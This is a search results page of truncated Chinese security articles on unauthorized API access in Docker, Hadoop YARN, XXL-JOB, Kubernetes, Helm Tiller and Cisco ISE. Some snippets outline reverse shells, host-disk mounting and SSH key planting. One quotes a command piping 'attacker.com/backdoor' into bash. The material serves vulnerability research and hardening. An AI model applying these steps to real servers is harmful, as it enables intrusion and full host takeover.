首页
学习
活动
专区
圈层
工具
发布

Docker API未授权命令执行

Docker Swarm使用标准的Docker API通过2375端口来管理每个Docker节点,Docker API是一个取代远程命令行界面(RCLI)的REST API。...当Docker节点的2375端口直接暴露并未做权限检查时,存在未授权访问漏洞,攻击者可以利用Docker API执行任何操作,包括执行Docker命令,创建、删除Docker以及获得宿主机权限等。...漏洞复现 访问目标的2375端口如下接口,若有信息,则存在Docker API未授权访问 http://x.x.x.x:2375/version http://x.x.x.x:2375/images http...://x.x.x.x:2375/info docker命令远程管理 可以使用docker命令本地远程管理docker,命令和在docker服务器管理一样。...我们可以执行如下命令启动一个未开启的容器,然后将宿主机的磁盘挂载到容器中。

2.7K20
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Docker API未授权漏洞复现

    乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。...01 漏洞成因 如果在docker上配置了远程访问,docker 节点上会开放一个TCP端口2375,绑定在0.0.0.0上,如果没有做限制的话,攻击者就可以通过Docker未授权来控制服务器 02 漏洞搭建...所以在这里直接使用脚本利用计划任务来反弹shell 这里尝试一个反弹shell的操作: 其中10.211.55.23是Kali的ip地址 10.211.55.2是docekr的未授权端口 import...05 实战 这里来模拟测试开启Docker API未授权之后,使用密钥登陆受害者机器 5.1 配置Docker支持远程访问 在这里使用我自己的阿里云主机进行测试 首先要配置docker支持远程访问 进行文件备份...5.3 关闭Docker API未授权 将我们的authorized_keys文件删除,将原来的文件复位 rm authorized_keys mv authorized_keys.bak authorized_keys

    4.4K20

    Hadoop Yarn REST API未授权漏洞利用挖矿分析

    一、背景情况 5月5日腾讯云安全曾针对攻击者利用Hadoop Yarn资源管理系统REST API未授权漏洞对服务器进行攻击,攻击者可以在未授权的情况下远程执行代码的安全问题进行预警,在预警的前后我们曾多次捕获相关的攻击案例...YARN提供有默认开放在8088和8090的REST API(默认前者)允许用户直接通过API进行相关的应用创建、任务提交执行等操作,如果配置不当,REST API将会开放在公网导致未授权访问的问题,那么任何黑客则就均可利用其进行远程命令执行...更多漏洞详情可以参考 http://bbs.qcloud.com/thread-50090-1-1.html 三、入侵分析 在本次分析的案例中,受害机器部署有Hadoop YARN,并且存在未授权访问的安全问题...,黑客直接利用开放在8088的REST API提交执行命令,来实现在服务器内下载执行.sh脚本,从而再进一步下载启动挖矿程序达到挖矿的目的。...最后还将相关结果上报到目标服务器$f2的re.php. tmp.txt内容示例: ? ?

    4.9K60

    漏洞研究(7):XXL-JOB执行器未授权访问漏洞(RESTful API)

    原理与危害 调度中心使用RESTful API对执行器进行调度通信时,可以使用accessToken向执行器证明自己的身份。...如果没有配置accessToken,任何人都能对执行器发起调度通信,对执行器所在的服务器进行任意命令执行,从而获得执行器所在服务器的权限。 3....加固措施 可参考XXL-JOB作者恨铁不成钢的防护建议:XXL JOB 未授权访问致远程命令执行 "漏洞" 声明 5.1 开启身份认证 配置accessToken,开启身份认证,调度中心和执行器的值需保持一致...xxl-job-executor-samples/xxl-job-executor-sample-springboot/target/xxl-job-executor-sample-springboot-2.2.0.jar 再次对执行器进行未授权任意代码执行...CentOS中) yum install iptables-services -y && service iptables save && systemctl enable iptables 再次对执行器进行未授权任意代码执行

    3.6K10

    【漏洞修复】Docker remote api未授权访问复现和修复

    Docker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集群的管理和扩展,由docker官方提供。...docker swarm的时候,管理的docker 节点上会开放一个TCP端口2375,绑定在0.0.0.0上,http访问会返回 404 page not found ,其实这是 Docker Remote API...,可以执行docker命令,比如访问 http://host:2375/containers/json 会返回服务器当前运行的 container列表,和在docker CLI上执行 docker ps...的效果一样,其他操作比如创建/删除container,拉取image等操作也都可以通过API调用完成, 0x02 漏洞危害 Docker daemon api是使用url代替命令行来操作docker...,docker swarm 是docker下的集群管理工具,在开放2375端口来监听集群容器时,会调用这个api,可以执行docker命令,root权限启动docker情况下可直接可以控制服务器。

    9.9K71

    K8s API Server未授权利用思路

    文章前言 k8s的Master节点上会暴露kube-apiserver,默认情况下会开启以下两个HTTP端口: A:Localhost Port HTTP服务 主机访问受保护 在HTTP中没有认证和授权检查...直接对集群下发指令 运维人员将"system:anonymous"用户绑定到"cluster-admin"用户组,使匿名用户可以通过6443端口以管理员权限向集群内部下发指令 漏洞检测 在浏览器中访问以下...URL: #格式说明 http://ip:port/ #使用实例 http://192.168.17.144:8080/ 返回以上信息说明存在K8s API Server未授权访问漏洞~ 漏洞利用 利用方式按严重程度可分为以下两种攻击类型...- name: default-secret 如果幸运的化我们可以找到恰当的Pod并通过信息收集以及逃逸获取宿主机的权限,之后控制节点以及整个集群~ 反弹shell Web...Server未授权访问的漏洞利用方法,在实际应用中我们需要注意对API Server的访问控制和安全加固,确保Kubernetes集群的安全性,同时也需要及时关注漏洞信息和安全通告,采取相应的修复措施

    1.9K10

    【漏洞通报】Cisco ISE API 未授权远程代码执行漏洞

    漏洞情况近期,火山信安实验室监测发现, Cisco Identity Services Engine (ISE) 的 REST API 接口存在高危安全漏洞(CVE-2025-20281,CVSS v3.1...该漏洞源于 ISE 未对特定 API 端点实施身份验证和授权检查,攻击者无需任何凭证即可通过构造恶意 HTTP 请求,直接在受影响设备上执行任意操作系统命令,导致完全系统控制。...0x01漏洞利用方式攻击者可通过向 CSE ISE 管理接口的未公开 API 端点(如 /ers/config/networkdevice/ 或 /admin/API/mnt/Session/,具体路径需结合实际环境探测...attacker.com/backdoor | bash 植入后门),或直接修改系统关键配置文件(如 /etc/sudoers 赋予攻击者持久化特权),结合 ISE 在企业网络中通常具备的高权限(如管理核心交换机、无线控制器及认证策略...Cisco ISE 3.2.2 及以上启用 Cisco ISE 多因素认证(MFA),强制管理员使用硬件令牌或生物识别登录定期审计 ISE 日志(/var/log/ise/ers.log),监控异常 API

    23210

    一个由“API未授权漏洞”引发的百万级敏感数据泄露

    GraphQL是目前最为流行的查询语言之一,它能够让API变得轻巧、灵活,而且对于开发人员十分友好且方便他们进行快速开发。但是它也容易放过、甚至给应用程序服务器带来各种恶意的查询。...除信息展示接口之外,Leo还发现存在大量未鉴权的数据修改API,通过这些API可以任意登录他人账号、修改他人信息,甚至修改APP链接进而实现投毒攻击。...不可忽视的API安全实际上,这并非个例,近年来Web应用数据泄露案例层出不穷。...在千行百业数字化转型的背景下,API成为了数字化体验的中心,APP、Web网站和小程序等应用的核心功能、微服务架构等均离不开API的支持。...而这些数据往往成为攻击者的目标,未经盘点的影子API、存在逻辑漏洞的API、未鉴权的API等,往往是攻击者窃取敏感数据的突破口。因此做好API 风险暴露面的识别与管控就是敏感数据的重中之重。

    1.2K20

    红队视角出发的k8s敏感信息收集——Kubernetes API 扩展与未授权访问

    攻击者通过未授权的 Tiller 服务部署恶意 Helm Chart → 2. 创建后门 Pod 并横向移动至 Istio 控制平面 → 3. 提取 Envoy 配置发现未加密的数据库服务 → 4....这些接口对于调试和监控非常有用,但同时也需要谨慎对待,以避免敏感信息泄露给未授权的用户。...attacker-service.default.svc.cluster.localEOFHelm Releases 与 Tiller(旧版本)攻击场景目标:利用旧版本 Helm(v2)的 Tiller 服务未授权访问漏洞...然而,这种方法复杂且不推荐,因为它绕过了正常的API接口并且可能违反安全策略。...通过 Tiller 安装这条命令指示Helm客户端连接到位于tiller-deploy.kube-system:44134的Tiller服务器,并部署位于当前目录下的名为malicious-chart的

    47111

    红队视角出发的k8s敏感信息收集——Kubernetes API 扩展与未授权访问

    针对 Kubernetes API 扩展与未授权访问 的详细攻击视角分析,聚焦 Custom Resource Definitions (CRD) 和 Aggregated API Servers 的潜在攻击面及利用方法...通过未授权的 metrics-server API 定位高负载节点 → 5. 横向渗透至数据库 Pod。...Servers 攻击场景 目标:利用附加 API 服务(如 metrics-server、Istio API)的未授权端点或已知漏洞,获取集群信息或执行命令。...--namespaced=true 识别未授权端点 使用 kubectl proxy 命令可以为Kubernetes API服务器创建一个代理服务器,它默认情况下会通过本地的API服务器认证和授权机制进行通信...此外,Aggregated API Servers若配置不当,也可能成为攻击入口点,允许攻击者获取内部服务的详细信息或执行未授权操作。

    80020

    ASP.NET Web API自身对CORS的支持: CORS授权检验的实施

    通过《EnableCorsAttribute特性背后的故事》我们知道:由CorsPolicyProvider提供的CorsPolicy表示目标Action采用的资源授权策略,ASP.NET Web API...在ASP.NET Web API的应用编程接口中,资源授权检验的结果通过类型CorsResult来表示。...二、CorsRequestContext 针对CORS的支持其实并不限于仅被使用在ASP.NET Web API上,用于根据提供的资源授权策略对跨域资源请求进行授权检验得引擎定义在程序集System.Web.Cors.dll...对于ASP.NET Web API来说,CORS资源授权检验实施的目标是表示当请求的HttpRequestMessage对象,这个对象自然不可能使用在ASP.NET的核心CORS引擎中。...] ASP.NET Web API自身对CORS的支持: CORS授权策略的定义和提供 [7] ASP.NET Web API自身对CORS的支持: CORS授权检验的实施 [8] ASP.NET

    2K110
    领券